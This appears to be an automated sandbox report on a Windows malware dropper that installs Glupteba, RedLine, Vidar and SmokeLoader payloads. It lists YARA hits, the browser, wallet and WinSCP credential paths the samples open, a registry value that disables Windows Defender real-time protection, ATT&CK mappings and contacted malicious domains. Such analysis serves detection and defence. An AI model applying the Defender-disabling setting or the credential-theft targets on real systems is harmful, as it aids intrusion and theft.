      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeQueries volume information: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe VolumeInformation
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exeQueries volume information: C:\Windows\SysWOW64\Macromed\Flash\activex.vch VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeQueries volume information: C:\Program Files (x86)\Company\NewProduct\d VolumeInformation
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeQueries volume information: C:\Program Files (x86)\Company\NewProduct\tmp.edb VolumeInformation
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeQueries volume information: C:\Program Files (x86)\Company\NewProduct\d VolumeInformation
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeQueries volume information: C:\Program Files (x86)\Company\NewProduct\d.jfm VolumeInformation
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeQueries volume information: C:\Program Files (x86)\Company\NewProduct\d VolumeInformation
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeQueries volume information: C:\Program Files (x86)\Company\NewProduct\d VolumeInformation
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01253308 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_0122F760 GetComputerNameA,GlobalAlloc,LookupAccountNameA,GetLastError,GetLastError,ConvertSidToStringSidA,GetLastError,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_004710D2 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0043BF20 GetComputerNameA,CompareStringW,GetVersionExA,OpenWaitableTimerW,CreateDirectoryW,GetModuleHandleW,WriteFileGather,GetWindowsDirectoryA,GetConsoleTitleW,VerifyVersionInfoW,RtlInitializeCriticalSection,AreFileApisANSI,CompareStringW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Lowering of HIPS / PFW / Operating System Security Settings:

      barindex
      Disable Windows Defender real time protection (registry)
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior

      Stealing of Sensitive Information:

      barindex
      Yara detected Glupteba
      Source: Yara matchFile source: Process Memory Space: KyTQCmNmjazMZrvIWzjrSsQG.exe PID: 6476, type: MEMORY
      Source: Yara matchFile source: 19.3.KyTQCmNmjazMZrvIWzjrSsQG.exe.37e0000.0.unpack, type: UNPACKEDPE
      Yara detected RedLine Stealer
      Source: Yara matchFile source: 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.963209956.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: YX7wpjoMI0vZoMwVbFh9XNIC.exe PID: 7008, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: YX7wpjoMI0vZoMwVbFh9XNIC.exe PID: 4240, type: MEMORY
      Source: Yara matchFile source: 6.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.407d438.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.3.9PWySv_SmMZ5POEp2PUJ_lbI.exe.afd0b0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.3.9PWySv_SmMZ5POEp2PUJ_lbI.exe.afd0b0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.407d438.1.unpack, type: UNPACKEDPE
      Yara detected SmokeLoader
      Source: Yara matchFile source: 30.1.MQ5u6_H0cs9EUXsesfNpGUNc.exe.400000.0.unpack, type: UNPACKEDPE
      Yara detected Vidar stealer
      Source: Yara matchFile source: 00000005.00000002.965244604.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.718547509.0000000002620000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.984787263.0000000002580000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000003.729200820.0000000002670000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: ZteJ0k9a2sM9jXcC3SndaipD.exe PID: 5988, type: MEMORY
      Source: Yara matchFile source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.2580e50.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.ZteJ0k9a2sM9jXcC3SndaipD.exe.2620000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.3.oO2a8x5RXTHKygCXkT7syx3J.exe.2670000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.ZteJ0k9a2sM9jXcC3SndaipD.exe.2620000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.oO2a8x5RXTHKygCXkT7syx3J.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.oO2a8x5RXTHKygCXkT7syx3J.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.2580e50.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.3.oO2a8x5RXTHKygCXkT7syx3J.exe.2670000.0.unpack, type: UNPACKEDPE
      Found many strings related to Crypto-Wallets (likely being stolen)
      Source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmpString found in binary or memory: ElectrumRule
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000002.1006010528.00000000028E5000.00000004.00000040.sdmpString found in binary or memory: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\Wallets\ElectronCashCURRENT
      Source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmpString found in binary or memory: JaxxRule
      Source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000002.1006010528.00000000028E5000.00000004.00000040.sdmpString found in binary or memory: \Wallets\ElectrumLTC4794,
      Source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmpString found in binary or memory: ExodusRule
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000002.1006010528.00000000028E5000.00000004.00000040.sdmpString found in binary or memory: \Wallets\MultiDogeshes\
      Source: ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000003.731578299.00000000051A0000.00000004.00000001.sdmpString found in binary or memory: set_UseMachineKeyStore
      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Tries to steal Crypto Currency Wallets
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDirectory queried: C:\Users\user\Documents
      Source: Yara matchFile source: 0000000B.00000002.994142610.0000000000ACA000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.972549932.0000000000A4A000.00000004.00000001.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected Glupteba
      Source: Yara matchFile source: Process Memory Space: KyTQCmNmjazMZrvIWzjrSsQG.exe PID: 6476, type: MEMORY
      Source: Yara matchFile source: 19.3.KyTQCmNmjazMZrvIWzjrSsQG.exe.37e0000.0.unpack, type: UNPACKEDPE
      Yara detected RedLine Stealer
      Source: Yara matchFile source: 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.963209956.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: YX7wpjoMI0vZoMwVbFh9XNIC.exe PID: 7008, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: YX7wpjoMI0vZoMwVbFh9XNIC.exe PID: 4240, type: MEMORY
      Source: Yara matchFile source: 6.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.407d438.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.3.9PWySv_SmMZ5POEp2PUJ_lbI.exe.afd0b0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.3.9PWySv_SmMZ5POEp2PUJ_lbI.exe.afd0b0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.407d438.1.unpack, type: UNPACKEDPE
      Yara detected SmokeLoader
      Source: Yara matchFile source: 30.1.MQ5u6_H0cs9EUXsesfNpGUNc.exe.400000.0.unpack, type: UNPACKEDPE
      Yara detected Vidar stealer
      Source: Yara matchFile source: 00000005.00000002.965244604.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.718547509.0000000002620000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.984787263.0000000002580000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000003.729200820.0000000002670000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: ZteJ0k9a2sM9jXcC3SndaipD.exe PID: 5988, type: MEMORY
      Source: Yara matchFile source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.2580e50.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.ZteJ0k9a2sM9jXcC3SndaipD.exe.2620000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.3.oO2a8x5RXTHKygCXkT7syx3J.exe.2670000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.ZteJ0k9a2sM9jXcC3SndaipD.exe.2620000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.oO2a8x5RXTHKygCXkT7syx3J.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.oO2a8x5RXTHKygCXkT7syx3J.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.2580e50.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.3.oO2a8x5RXTHKygCXkT7syx3J.exe.2670000.0.unpack, type: UNPACKEDPE

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsNative API1DLL Side-Loading11DLL Side-Loading11Disable or Modify Tools11OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer15Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsCommand and Scripting Interpreter2Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1Credential API Hooking1Account Discovery1Remote Desktop ProtocolData from Local System31Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Registry Run Keys / Startup Folder1Bypass User Access Control1Obfuscated Files or Information31Input Capture2File and Directory Discovery15SMB/Windows Admin SharesCredential API Hooking1Automated ExfiltrationNon-Application Layer Protocol5Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Process Injection512Software Packing31Credentials in Registry1System Information Discovery67Distributed Component Object ModelInput Capture2Scheduled TransferApplication Layer Protocol126SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptRegistry Run Keys / Startup Folder1DLL Side-Loading11LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsProxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonBypass User Access Control1Cached Domain CredentialsSecurity Software Discovery461VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading12DCSyncVirtualization/Sandbox Evasion161Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion161Proc FilesystemProcess Discovery14Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection512/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 439281 Sample: yevbZfdCqR.exe Startdate: 23/06/2021 Architecture: WINDOWS Score: 100 88 email.yg9.me 2->88 118 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->118 120 Multi AV Scanner detection for domain / URL 2->120 122 Found malware configuration 2->122 124 19 other signatures 2->124 9 yevbZfdCqR.exe 4 49 2->9         started        14 svchost.exe 2->14         started        16 explorer.exe 2->16         started        signatures3 process4 dnsIp5 100 jom.diregame.live 9->100 102 136.144.41.152, 49735, 80 WORLDSTREAMNL Netherlands 9->102 104 10 other IPs or domains 9->104 72 C:\Users\...\ulVElw2mPS2j3QKCM9gOxM3j.exe, PE32 9->72 dropped 74 C:\Users\...\oO2a8x5RXTHKygCXkT7syx3J.exe, PE32 9->74 dropped 76 C:\Users\...\gUlDp5No64Xfcgfbo3IlvG0y.exe, PE32 9->76 dropped 78 27 other files (12 malicious) 9->78 dropped 142 Drops PE files to the document folder of the user 9->142 144 Creates HTML files with .exe extension (expired dropper behavior) 9->144 146 Performs DNS queries to domains with low reputation 9->146 148 Disable Windows Defender real time protection (registry) 9->148 18 gDoWsyv4ZlqhjBKjyfkjR1BY.exe 9->18         started        21 M5uLwz0sXvZcR89u_43Nm9v8.exe 9->21         started        23 ZteJ0k9a2sM9jXcC3SndaipD.exe 86 9->23         started        27 12 other processes 9->27 150 Sets debug register (to hijack the execution of another thread) 14->150 152 Modifies the context of a thread in another process (thread injection) 14->152 file6 signatures7 process8 dnsIp9 54 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 18->54 dropped 56 C:\Users\user\AppData\Local\...\System.dll, PE32 18->56 dropped 64 131 other files (none is malicious) 18->64 dropped 58 C:\Program Files (x86)\...\md8_8eus.exe, PE32 21->58 dropped 60 C:\Program Files (x86)\Company\...\jooyu.exe, PE32 21->60 dropped 62 C:\Program Files (x86)\...\jingzhang.exe, PE32 21->62 dropped 66 2 other files (1 malicious) 21->66 dropped 29 md8_8eus.exe 21->29         started        34 jooyu.exe 21->34         started        36 jingzhang.exe 21->36         started        38 file4.exe 21->38         started        90 159.69.20.131 HETZNER-ASDE Germany 23->90 92 sergeevih43.tumblr.com 74.114.154.22 AUTOMATTICUS Canada 23->92 68 6 other files (none is malicious) 23->68 dropped 126 Detected unpacking (changes PE section rights) 23->126 128 Detected unpacking (overwrites its own PE header) 23->128 130 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 23->130 132 Tries to steal Crypto Currency Wallets 23->132 94 g-partners.top 138.68.187.227 DIGITALOCEAN-ASNUS United States 27->94 96 g-partners.in 27->96 98 5 other IPs or domains 27->98 70 15 other files (none is malicious) 27->70 dropped 134 DLL reload attack detected 27->134 136 May check the online IP address of the machine 27->136 138 Tries to harvest and steal browser information (history, passwords, etc) 27->138 140 Injects a PE file into a foreign processes 27->140 40 MQ5u6_H0cs9EUXsesfNpGUNc.exe 27->40         started        42 rundll32.exe 27->42         started        44 Browzar.exe 27->44         started        46 6 other processes 27->46 file10 signatures11 process12 dnsIp13 106 101.36.107.74 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK China 29->106 108 iplogger.org 29->108 80 C:\Users\user\Documents\...\md8_8eus.exe, PE32 29->80 dropped 154 Tries to harvest and steal browser information (history, passwords, etc) 29->154 110 www.facebook.com 34->110 112 star-mini.c10r.facebook.com 34->112 114 ip-api.com 34->114 48 jfiag3g_gg.exe 34->48         started        50 jfiag3g_gg.exe 34->50         started        82 C:\Users\user\AppData\Local\...\install.dll, PE32 36->82 dropped 84 C:\Users\user\AppData\...84ewtonsoft.Json.dll, PE32 36->84 dropped 52 conhost.exe 36->52         started        86 C:\Users\user\AppData\Local\Temp\AE30.tmp, PE32 40->86 dropped 156 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 40->156 158 Renames NTDLL to bypass HIPS 40->158 160 Checks if the current machine is a virtual machine (disk enumeration) 40->160 162 Writes to foreign memory regions 42->162 164 Allocates memory in foreign processes 42->164 116 www.browzar.com 139.59.176.201 DIGITALOCEAN-ASNUS Singapore 44->116 file14 signatures15 process16

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      yevbZfdCqR.exe68%VirustotalBrowse
      yevbZfdCqR.exe31%MetadefenderBrowse
      yevbZfdCqR.exe69%ReversingLabsWin32.Trojan.Bsymem

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Program Files (x86)\Company\NewProduct\jooyu.exe100%AviraTR/AD.JazoStealer.znvpf
      C:\Program Files (x86)\Company\NewProduct\file4.exe100%AviraTR/Crypt.XPACK.Gen
      C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe100%AviraHEUR/AGEN.1114952
      C:\Program Files (x86)\Company\NewProduct\jooyu.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Company\NewProduct\file4.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Browzar\Browzar.exe3%MetadefenderBrowse
      C:\Program Files (x86)\Browzar\Browzar.exe2%ReversingLabs
      C:\Program Files (x86)\Browzar\Uninstall.exe3%ReversingLabs
      C:\Program Files (x86)\Company\NewProduct\Uninstall.exe4%ReversingLabs
      C:\Program Files (x86)\Company\NewProduct\file4.exe19%MetadefenderBrowse
      C:\Program Files (x86)\Company\NewProduct\file4.exe79%ReversingLabsWin32.Downloader.BadOffer
      C:\Program Files (x86)\Company\NewProduct\jingzhang.exe29%MetadefenderBrowse
      C:\Program Files (x86)\Company\NewProduct\jingzhang.exe79%ReversingLabsWin32.Trojan.Tnega
      C:\Program Files (x86)\Company\NewProduct\jooyu.exe44%MetadefenderBrowse
      C:\Program Files (x86)\Company\NewProduct\jooyu.exe90%ReversingLabsWin32.Trojan.CookiesStealer
      C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe34%MetadefenderBrowse
      C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe93%ReversingLabsWin32.Infostealer.Passteal
      C:\Program Files (x86)\lighteningplayer\connection.dll0%MetadefenderBrowse
      C:\Program Files (x86)\lighteningplayer\connection.dll0%ReversingLabs
      C:\Program Files (x86)\lighteningplayer\data_load.exe0%MetadefenderBrowse
      C:\Program Files (x86)\lighteningplayer\data_load.exe0%ReversingLabs
      C:\Program Files (x86)\lighteningplayer\libssp-0.dll0%MetadefenderBrowse
      C:\Program Files (x86)\lighteningplayer\libssp-0.dll0%ReversingLabs

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      41.0.jfiag3g_gg.exe.400000.0.unpack100%AviraTR/Crypt.ULPM.GenDownload File
